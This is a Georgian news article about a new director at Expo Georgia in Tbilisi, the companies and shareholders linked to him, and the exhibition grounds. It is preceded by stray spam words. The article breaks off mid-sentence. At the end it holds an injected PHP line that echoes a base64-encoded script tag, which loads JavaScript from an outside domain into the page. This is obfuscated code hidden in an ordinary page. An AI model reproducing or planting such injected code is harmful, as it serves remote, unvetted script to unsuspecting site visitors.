tube
ავერსი jaluzi

სააქციო საზოგადოება „ექსპო ჯორჯიაში“ ცვლილებებია. სამეწარმეო რეესტრის მიხედვით, კომპანიაში დირექტორად გიორგი მაჭავარიანი დაინიშნა. მან ამ პოსტზე რესან ქიქავა ჩაანაცვლა, რომელიც 28 იანვრამდე დირექტორი იყო როგორც სს „ექსპო ჯორჯიაში“, ასევე „ექსპო ჯორჯია მენეჯმენტი 1958“-ში, რომელიც 2024 წლის მაისში დაფუძნდა. ამ კომპანიას კვლავ რესან ქიქავა უხელმძღვანელებს.

„ექსპო ჯორჯია მენეჯმენტი 1958“ 2024 წლის მაისში დაფუძნდა. მისი მეწილეები რესან ქიქავა (10%), ლადო ჩიხლაძე (40%) და ნოდარ საბანაძე არიან (50%).

რაც შეეხება სააქციო საზოგადოების ახალ დირექტორს, გიორგი მაჭავარიანი პარალელურად კიდევ 2 კომპანიის დირექტორია. ის ხელმძღვანელობს „ექსპო ჯორჯია მენეჯმენტი 1958“-ს მსგავსად 2024 წლის მაისში დაფუძნებულ შპს „სითი ექსპოს“. ამ კომპანიის 90%-იანი წილის მფლობელი ბიზნესმენი მინდია საბანაძე, ხოლო 10%-იანი წილის კი ზურაბ ხუციშვილია.

კიდევ ერთი კომპანია, სადაც გიორგი მაჭავარიანი დირექტორის პოზიციას იკავებს „სითი დეველოპმენტია“, რომელიც 2021 წელსაა დარეგისტრირებული და მისი 100%-იანი წილის მმართველი „აი ჯი დეველოფმენტ ჯორჯიაა“, რომელიც თავის მხრივ IG International-ის შვილობილია.

თავად სს „ექსპო ჯორჯია“ 1996 წელსაა დაფუძნებული და დღეისთვის მისი სამეთვალყურეო საბჭოს წევრები არიან კახაბერ გველესიანი, თეიმურაზ ჩიხლაძე, ამირან ბურჭულაძე, ლადო ჩიხლაძე.

ცნობისთვის: რამდენიმე თვის წინ მედიაში გავრცელდა ინფორმაცია, რომ „ექსპო ჯორჯიას“ ტერიტორიაზე დეველოპერული პროექტის განხორციელება იგეგმება, რისთვისაც მფლობელებმა ბიზნესმენ მინდია საბანაძის შვილთან, ნოდარ საბანაძესთან ერთად მენეჯმენტ კომპანია - „ექსპო ჯორჯია მენეჯმენტი 1958“ შექმნეს.

7 410 კვ.მ-ზე განთავსებული თერთმეტი საგამოფენო პავილიონი და 29 200 კვ.მ ღია გამწვანებულ სივრცე - ასეთია თბილისში მდებარე „ექსპო ჯორჯიას“ ტერიტორია, რომელიც არამარტო საქართველოს, არამედ სამხრეთ კავკასიის რეგიონის წამყვანი საგამოფენო ცენტრია. ის მთელი წლის განმავლობაში ორგანიზებას უწევს და მასპინძლობს მრავალფეროვან ინდუსტრიულ გამოფენებს,

112
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");